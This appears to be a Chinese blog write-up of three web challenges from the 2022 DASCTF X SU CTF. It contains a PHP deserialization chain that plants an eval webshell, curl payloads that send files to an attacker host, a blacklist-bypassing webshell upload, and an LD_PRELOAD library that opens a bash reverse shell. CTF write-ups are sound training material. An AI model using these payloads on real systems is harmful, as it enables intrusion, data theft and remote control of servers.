2022DASCTF X SU 三月春季挑战赛 web复现

已于 2022-11-01 17:38:34 修改
阅读量996 收藏
点赞数
分类专栏: 比赛 文章标签: web安全
于 2022-06-12 18:23:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/125248134
版权

目录

ezpop

Calc:

Upgdstore:

ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

反序列化,修改crow中v1的值,利用crow中的eval跳到mix中,利用eval函数来执行命令。

利用链:

fin::__destruct->what::__toString->fin::_run->crow::__invoke->fin::_call->mix::get_flag

Exp:

<?php



class crow

{

    public $v1;

    public $v2;

    public function __construct()

    {

        $this->v1=new fin();

        $this->v1->f1=new mix();

        $this->v1->f1->m1="?><?=eval(\$_POST[1]);";

    }

}



class fin

{

    public $f1;

    public function __construct()

    {

        $f1=$this->f1;

    }



}



class what

{

    public $a;



    public function __construct()

    {

        $this->a=new fin();

        $this->a->f1=new crow();

    }

}

class mix

{

    public $m1;



    public function __construct()

    {

        $m1=$this->m1;

    }



}

$a=new fin();

$a->f1=new what();

echo serialize($a);

payload:(蚁剑的密码)

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

然后cat找flag即可。

Calc:

源码:

#coding=utf-8

from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory

import random

from urllib import parse

import os

from werkzeug.utils import secure_filename

import time



app=Flask(__name__)



def waf(s):

    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']

    flag = True

    for no in blacklist:

        if no.lower() in s.lower():

            flag= False

            print(no)

            break

    return flag

   



@app.route("/")

def index():

    "欢迎来到SUctf2022"

    return render_template("index.html")



@app.route("/calc",methods=['GET'])

def calc():

    ip = request.remote_addr

    num = request.values.get("num")

    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)

   

    if waf(num):

        try:

            data = eval(num)

            os.system(log)

        except:

            pass

        return str(data)

    else:

        return "waf!!"



if __name__ == "__main__":

app.run(host='0.0.0.0',port=5000)

 提交时会请求/calc路由并提交num参数,源码中当访问calc路由后会进入calc函数,接收num参数,拼接到log里面,再经过waf函数,没有被过滤会先执行eval,然后执行system函数

Waf中过滤了括号,但没有禁用反引号,所以可以执行system函数。

Payload:

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23ls

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23cat%09Th1s*

Upgdstore:

过滤了一大堆函数,只有少数几个可以用。

base64_decode没有被过滤,可以利用show_source查看源码。

<?php

base64_decode("c2hvd19zb3VyY2U=")("index.php");



得到源码:

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计,传个火?!
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }

    
    return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}

$content = file_get_contents($temp_file);
if(fun($content)){
    die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

strstr()函数对大小写敏感,可以利用大小写绕过waf

利用base64先上传一句话木马。

<?php @eval($_POST['a']);?>

#f82ffc0257783176e9c79a42e32657d0.php

再上传一个php文件使用include来包含刚刚的一句话,利用伪协议对base64进行解码

cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA==
<?php

Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA=="));

之后上传上传exp.c和gconv-modules

构造恶意的exp.c

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

void payload()

{

       system("bash -c 'exec bash -i &>/dev/tcp/ip/6666 <&1'");

}

int geteuid()

{

       if (getenv("LD_PRELOAD") == NULL)

       {

              return 0;

       }

       unsetenv("LD_PRELOAD");

       payload();

}

然后编译成so文件

利用move_uploaded_file进行文件上传

然后访问反弹shell。

a=putenv("LD_PRELOAD=/var/www/html/uploads/exp.so");mail("","","","","");

f0njl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow菜狗 web 一言既出
hypocrite2的博客
05-15 336
例如,example.com/query?表达式为intval($_GET[num])==1919810,即将$_GET['num']强制转换为整数后,判断是否等于1919810。令num=114514进入条件,然后加上一个数,使得num变为1919810,从而通过第二个判断,不抛出错误,执行echo $flag;assert("intval($_GET[num])==1919810") or die("一言既出,驷马难追!
【2022DASCTF X SU三月春季挑战赛 web
errorr0
04-20 1501
DASCTF
2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
臭nana的博客
04-03 4585
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三月春季挑战赛-p
2022DASCTF X SU 三月春季挑战赛——REVERSE——easyre
qq_39763436的博客
03-31 763
2022DASCTF X SU 三月春季挑战赛 反序列化之签到题(easyre) 1、使用ExeinfoPe工具查看一下easyre.exe的详细信息,可以看到这个程序加了一个.aspack类型的壳; 2、使用Unpacker_ASPack工具进行自动脱壳,点击Dump,进行脱壳,并另存为; 3、使用较新版本的IDA打开,按F5进行反编译,找到main()函数后,对代码进行分析; 4、这个Destination就是我们需要的,而代码中只有这个函数sub_401771(Destination)用到
DASCTF Apr.2023 X SU战队2023开局之战 pwn
m0_63437215的博客
04-24 614
DASCTF Apr.2023 X SU战队2023开局之战
可以独立编译的CWP-SU ximage指令的源代码
05-03
CWP-SU ximage指令是Seismic Unix(SU)软件包中的一个重要组成部分,它主要用于处理地震数据。Seismic Unix是一个广泛使用的开源地震成像和数据分析软件,由科罗拉多矿业学院(CWP,Center for Wave Phenomena)...
Web前端项目之小米SU7官网制作
最新发布
06-02
在本项目"Web前端项目之小米SU7官网制作"中,我们将探讨三个主要的技术领域:HTML、CSS和JavaScript,这些都是构建代网页应用的基础。这个项目包含完整的代码、视频教程和相关图片,为学习者提供了一个实际操作的...
最锋利的Visual Studio Web开发工具扩展:Web Essentials使用详解
01-20
首先,从Extension Manager里安装:最新版本是19号发布的2.5版 然后重启你的VS开发环境,就可以使用它提供的方便功能了。 Web Essentials对CSS、JavaScript和HTML都提供了很多快捷...很多CSS3的代码都不兼容,不同的浏
基于模拟退火算法的宽角度X射线超反射镜设计研究
02-11
应用于硬X射线波段的宽带多层膜光学元件——宽角度X射线超反射镜的设计可以归结为一个连续变量的多维多极值的全局优化问题。缺少一种有效的全局优化方法是阻碍解决这一难题的一个关键。模拟退火算法是一种简单而且...
Web:Cia dirbsime su webu
03-27
在本文中,我们将深入探讨与“Web:Cia dirbsime su webu”相关的主题,重点关注PHP这门服务器端脚本语言。PHP(Hypertext Preprocessor)是一种广泛使用的开源脚本语言,尤其适用于Web开发,可以嵌入到HTML中执行。...
2022年3月buu月赛dasctf
weixin_51458899的博客
03-27 5990
2022年3月buu月赛dasctf web ezpop <?php class what { public $a; public function __construct(){ $this->a = new fin(); } } class mix{ public $m1; public function __construct(){ $this->m1 = "?><?=system('cat
DASCTF-三月赛-web
weixin_45800126的博客
04-15 858
title: DASCTF 三月web date: 2021-04-07 15:04:52 tags: DASCTF BestDB 0x01 源码给了查询语句 $sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\""; 过滤单引号,但没过滤双引号,所以选择闭合后面的用户名进行union查询 查表名 query=-1"/**/union/**/select/**/group_concat(table_na.
2022DASCTF X SU 三月春季挑战赛-reverse-easyre(
ookami6497的博客
04-03 870
先用PE查壳,一开始没看清楚,以为没壳,动调了半天,后来才看到是个ASP壳 用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.
2022HWS硬件安全冬令营 X DASCTF Jan部分Writeup
qq_42815161的博客
01-25 3705
文章目录 MISC badPDF gogogo PWN 送分题 CRYPTO babyrsa MISC badPDF 首先是一个lnk的windows快捷方式,使用windows打开,会看到一个一闪而过的cmd,然后打开了一个pdf。运行之后文件的结构似乎会发生改变,看了下快捷方式的指向内容发了东西。 %SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4Zokyum
DASCTF X SU三月
Re_ly0n的博客
03-27 559
Ezpop 因为疫情学校周末开始补课了,昨天就中午看了看题,做了一个web,挺简单的简单记录下。利用链很好找。说下坑点吧。当用hackerbar传入cmd参数时要使用raw,如下 然后导致我以为是需要原生类进行反序列化。 利用链 fin::__destruct()---->what::__toString()----->fin::run----->crow::__invoke()----->fin::world()----->fin::__call()-----&g
2022DASCTF X SU 三月春季挑战赛web部分
qq_52988816的博客
03-28 816
简单写一下
2022DASCTF MAY web
weixin_63231007的博客
07-20 458
命令"'目标地址端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'curl-v--path-as-is目标地址端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。所有需要我们上传一个users.go文件,然后其执行,我们访问users,会返回文件执行结果。......
2022DASCTF7月赋能赛(
m0_62422842的博客
07-28 2513
DASCTF七月赋能赛的三个web,涉及到sql注入,模板注入,php反序列化以及session文件包含
DASCTF 2022.4
weixin_44687621的博客
04-25 2648
Web warmup_php 查看主页源码如下 <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public funct
2022dasctf x su 三月春季挑战赛
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值